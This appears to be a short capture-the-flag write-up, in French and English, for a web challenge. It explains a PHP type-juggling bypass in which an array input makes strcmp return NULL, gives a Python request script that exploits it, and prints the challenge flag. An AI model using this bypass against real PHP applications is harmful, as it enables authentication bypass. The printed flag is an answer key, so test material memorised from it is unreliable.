Niveau de Difficulté : Medium

Catégorie du Challenge : Web

Description :
Hack me!

Steps to Solve

Il s'agit d'une vulnérabilité de type juggling en PHP. Si nous soumettons notre entrée avec un tableau au lieu d'une chaîne, le strcmp évaluera à NULL et NULL == 0 en PHP.

import re
import requests

HOST = "IP" ###
PORT = 7200 ###

r = requests.get(f"http://{HOST}:{PORT}/?input[]=a")
flag = re.search(r'FLAG{.*}', r.text).group(0)
print(flag)

Flag

FLAG{haCK_mE_MAn!}